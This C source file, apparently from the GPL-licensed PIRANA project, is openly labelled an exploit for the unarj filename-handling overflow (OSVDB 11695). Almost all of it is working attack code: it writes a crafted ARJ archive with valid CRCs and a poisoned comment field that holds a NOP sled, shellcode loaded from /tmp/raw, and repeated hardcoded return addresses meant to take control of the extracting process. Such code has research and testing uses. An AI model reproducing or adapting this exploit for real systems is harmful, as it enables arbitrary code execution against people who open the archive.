/*

Copyright (C) 2005 - 2006 Jean-Sbastien Guay-Leroux

This file is part of PIRANA.

PIRANA is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

PIRANA is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with PIRANA; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA

*/

/*

Exploit for the vulnerability: 
unarj Filename Handling Overflow
OSVDB ID: 11695 

coded by Jean-Sbastien Guay-Leroux
December 2005

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <limits.h>/

// Data used to calculate CRC
typedef ulong UCRC;     /* CRC-32 */
typedef unsigned char  uchar;
static UCRC   crctable[256];
UCRC   crc;
#define CRCPOLY         0xEDB88320L
#define CRC_MASK        0xFFFFFFFFL
#define UPDATE_CRC(r,c) r=crctable[((uchar)(r)^(uchar)(c))&0xff]^(r>>CHAR_BIT)

// Main header definition
#define M_HEADER_ID		0
#define M_BHEADER_SIZE		2
#define M_FIRST_HDR_SIZE	4
#define M_ARCHIVER_VERSION	5
#define M_MINIMUM_TO_EXTRACT	6
#define M_HOST_OS		7
#define M_ARJ_FLAGS		8
#define M_SECURITY_VERSION	9
#define M_FILE_TYPE		10
#define M_RESERVED		11
#define M_DATE_CREATED		12
#define M_DATE_MODIFIED		16
#define M_ARCHIVE_SIZE		20
#define M_ENVELOPPE_POSITION	24
#define M_FILESPEC_POS		28
#define M_LENGTH_ENVELOPPE	30
#define M_NOT_USED1		32
#define M_NOT_USED2		34
#define M_FILENAME		( first_hdr_size + M_FIRST_HDR_SIZE )
#define M_COMMENT		( M_FILENAME + strlen (filename) + 1)
#define M_BASIC_HEADER_CRC	( bheader_size + M_FIRST_HDR_SIZE)
#define M_FIRST_EXT_HSIZE	( bheader_size + L_FIRST_HDR_SIZE + 4)

// Local file header
#define L_HEADER_ID		0
#define L_BHEADER_SIZE		2
#define L_FIRST_HDR_SIZE	4
#define L_ARCHIVER_VERSION	5
#define L_MINIMUM_TO_EXTRACT	6
#define L_HOST_OS		7
#define L_ARJ_FLAGS		8
#define L_METHOD		9
#define L_FILE_TYPE		10
#define L_RESERVED		11
#define L_DATE_MODIFIED		12
#define L_COMPRESSED_SIZE	16
#define L_ORIGINAL_SIZE		20
#define L_ORIGINAL_CRC		24
#define L_FILESPEC_POS		28
#define L_FILE_ACCESS_MODE	30
#define L_HOST_DATA		32
#define L_NOT_USED1		34
#define L_FILENAME		( first_hdr_size + L_FIRST_HDR_SIZE )
#define L_COMMENT		( L_FILENAME + strlen (poisoned_filename) + 1 )
#define L_BASIC_HEADER_CRC	( bheader_size + L_FIRST_HDR_SIZE )
#define L_FIRST_EXT_HSIZE	( bheader_size + L_FIRST_HDR_SIZE + 4 )

#define DEBUG 0

char *shellcode1;

static void
make_crctable()
{
    uint i, j;
    UCRC r;

    for (i = 0; i <= UCHAR_MAX; i++)
    {
        r = i;
        for (j = CHAR_BIT; j > 0; j--)
        {
            if (r & 1)
                r = (r >> 1) ^ CRCPOLY;
            else
                r >>= 1;
        }
        crctable[i] = r;
    }
}

unsigned long calculate_checksum (char *str, int len) {

	make_crctable ();

	crc = CRC_MASK;

	while (len--)
		UPDATE_CRC (crc, *str++);

	return crc;
}

FILE * open_file (char *filename) {

	FILE *fp;

	fp = fopen ( filename , "w" );

	if (!fp) {
		perror ("Cant open file");
		exit (-1);
	}

	return fp;
}

void put_byte (char *ptr, unsigned char data) {
	*ptr = data;
}

void put_word (char *ptr, unsigned short data) {
	put_byte (ptr, data);
	put_byte (ptr + 1, data >> 8);
}

void put_longword (char *ptr, unsigned long data) {
	put_byte (ptr, data);
	put_byte (ptr + 1, data >> 8);
	put_byte (ptr + 2, data >> 16);
	put_byte (ptr + 3, data >> 24);
}

void read_shellcode () {

        FILE *fd;
        int c;
        int i = 0;

        if ( (fd = fopen ("/tmp/raw", "r")) == NULL) {
                perror ("Cant open /tmp/raw");
                exit (-1);
        }

        while ( ((c = fgetc (fd) ) != EOF) && (i < 1024) ) {
                shellcode1[i++] = c;
        }
        shellcode1[i] = 0x00;

        if (fclose (fd)) {
                perror ("Cant close /tmp/raw");
                exit (-1);
        }
}

void usage (char *progname) {

	printf ("\nTo use:\n");
	printf ("%s <offset> <archive name>\n\n", progname);

	exit (-1);
}

int main (int argc, char *argv[]) {

	FILE *fp;
	char *hdr = (char *) malloc (4096);
	int written_bytes;
	int total_size;
	int offset;
	char *filename = (char *) malloc (256);
	char comment[] = "";
	int main_header_size, local_header_size;
	short bheader_size;
	char first_hdr_size;
	char *poisoned_filename = (char *) malloc (4096);
	char *poisoned_comment  = (char *) malloc (4096);
	int i;

	if (!hdr) {
		perror ("Error allocating memory");
		exit (-1);
	}

	if ( argc != 3) {
		usage ( argv[0] );
	}

	sscanf (argv[1], "0x%x", &offset);
	strncpy (filename, argv[2], 255);

        shellcode1 = (char *) malloc (1024);
	memset (hdr, 1, 4096);

	first_hdr_size = 0x22;
        bheader_size    = first_hdr_size + strlen (filename) + 1 + strlen (comment) + 1;

	// Main header
	put_word	(hdr + M_HEADER_ID, 0xea60);
	put_word	(hdr + M_BHEADER_SIZE, bheader_size);
	put_byte	(hdr + M_FIRST_HDR_SIZE, first_hdr_size);
	put_byte	(hdr + M_ARCHIVER_VERSION, 0x0b);
	put_byte	(hdr + M_MINIMUM_TO_EXTRACT, 0x01);
	put_byte	(hdr + M_HOST_OS, 0x0a);
	put_byte	(hdr + M_ARJ_FLAGS, 0x10);
	put_byte	(hdr + M_SECURITY_VERSION, 0x00);
	put_byte	(hdr + M_FILE_TYPE, 0x02);
	put_byte	(hdr + M_RESERVED, 0xd3);
	put_longword	(hdr + M_DATE_CREATED, 0x338a08d3);	
	put_longword	(hdr + M_DATE_MODIFIED, 0x338a08d3);
	put_longword	(hdr + M_ARCHIVE_SIZE, 0x00000000);
	put_longword	(hdr + M_ENVELOPPE_POSITION, 0x00000000);
	put_word	(hdr + M_FILESPEC_POS, 0x0000);
	put_word	(hdr + M_LENGTH_ENVELOPPE, 0x0000);
	put_word	(hdr + M_NOT_USED1, 0x0000);
	put_longword	(hdr + M_NOT_USED2, 0x00000000);
	memcpy		(hdr + M_FILENAME, filename, strlen (filename) + 1);	
	put_byte	(hdr + M_COMMENT - 1, 0x00);
	put_byte	(hdr + M_COMMENT, 0x00);
	//put_longword	(hdr + M_BASIC_HEADER_CRC, 0xef598877);
	put_longword	(hdr + M_BASIC_HEADER_CRC,
				calculate_checksum ( (hdr + L_FIRST_HDR_SIZE), bheader_size) ^
				CRC_MASK);
	put_word	(hdr + M_FIRST_EXT_HSIZE, 0x0000);

	//main_header_size = 54;
	main_header_size = bheader_size + 
				M_FIRST_HDR_SIZE + // 4 first are ignored
				6; 		   // CRC + EXT SIZE	
				

	memset (poisoned_filename, 0x41, 10);

	memset (poisoned_comment, 0x90, 800);
	read_shellcode ();
	memcpy (poisoned_comment + 440 - strlen (shellcode1), shellcode1, strlen (shellcode1));
	for (i = 440; i < 800; i = i + 4) { put_longword (poisoned_comment + i, 0xbfffeeb0); }
	put_byte (poisoned_comment + 800, 0x00);

	first_hdr_size	= 0x2e;
	bheader_size	= first_hdr_size + strlen (poisoned_filename) + 1 + strlen (poisoned_comment) + 1;

	// Header of a local file
	put_word	(hdr + main_header_size + L_HEADER_ID, 0xea60);
	put_word	(hdr + main_header_size + L_BHEADER_SIZE, bheader_size);
	put_byte	(hdr + main_header_size + L_FIRST_HDR_SIZE, first_hdr_size);
	put_byte	(hdr + main_header_size + L_ARCHIVER_VERSION, 0x0b);
	put_byte	(hdr + main_header_size + L_MINIMUM_TO_EXTRACT, 0x01);
	put_byte	(hdr + main_header_size + L_HOST_OS, 0x02);
	put_byte	(hdr + main_header_size + L_ARJ_FLAGS, 0x10);
	put_byte	(hdr + main_header_size + L_METHOD, 0x00);
	put_byte	(hdr + main_header_size + L_FILE_TYPE, 0x00);
	put_byte	(hdr + main_header_size + L_RESERVED, 0xd3);
	put_longword	(hdr + main_header_size + L_DATE_MODIFIED, 0x338a08a3);
	put_longword	(hdr + main_header_size + L_COMPRESSED_SIZE, 0x00000000);
	put_longword	(hdr + main_header_size + L_ORIGINAL_SIZE, 0x00000000);
	put_longword	(hdr + main_header_size + L_ORIGINAL_CRC, 0x00000000);
	put_longword	(hdr + main_header_size + L_FILESPEC_POS, 0x200);
	put_longword	(hdr + main_header_size + L_FILE_ACCESS_MODE, 520);
	put_longword    (hdr + main_header_size + L_HOST_DATA, 0x0000);
	put_longword    (hdr + main_header_size + L_NOT_USED1, 0x00000000);
	put_longword    (hdr + main_header_size + L_NOT_USED1 + 4, 0x338a08a3);
	put_longword    (hdr + main_header_size + L_NOT_USED1 + 8, 0x338a08a3);
	put_longword    (hdr + main_header_size + L_NOT_USED1 + 12, 0x00000000);
	memcpy		(hdr + main_header_size + L_FILENAME, poisoned_filename, strlen (poisoned_filename) + 1);
	put_byte	(hdr + main_header_size + L_COMMENT - 1, 0x00);
	memcpy		(hdr + main_header_size + L_COMMENT, poisoned_comment, strlen (poisoned_comment) + 1);
	put_longword	(hdr + main_header_size + L_BASIC_HEADER_CRC, 
				calculate_checksum ( (hdr + main_header_size + L_FIRST_HDR_SIZE), bheader_size) ^ 
				CRC_MASK);
	put_word	(hdr + main_header_size + L_FIRST_EXT_HSIZE, 0x0000);

	// Next header, announcing end of archive
	put_word	(hdr + main_header_size + bheader_size + L_FIRST_HDR_SIZE + 6, 0xea60); 
	put_word	(hdr + main_header_size + bheader_size + L_FIRST_HDR_SIZE + 8, 0x0000);

	// local_header_size = 70;
	local_header_size = L_FIRST_HDR_SIZE + 		// 4 premiers bytes non compts
				bheader_size + 		// grandeur jusqu'au comment
				6 +			// L_BASIC_HEADER_CRC + L_FIRST_EXT_HSIZE
				4;			// 4 bytes de prochaine entete.

	total_size = main_header_size + local_header_size;

	fp = open_file (filename);

	if ( ( written_bytes = fwrite ( hdr, total_size, 1, fp)) != 0 ) {
		if (DEBUG) printf ("%d bytes have been written to the file\n", written_bytes);
	} else {
		perror ("Cant write to the file\n");
	}

	fclose (fp);

	if (DEBUG) printf ("0x%x has been used as an offset in the file %s\n", offset, filename);

	return 0;
}
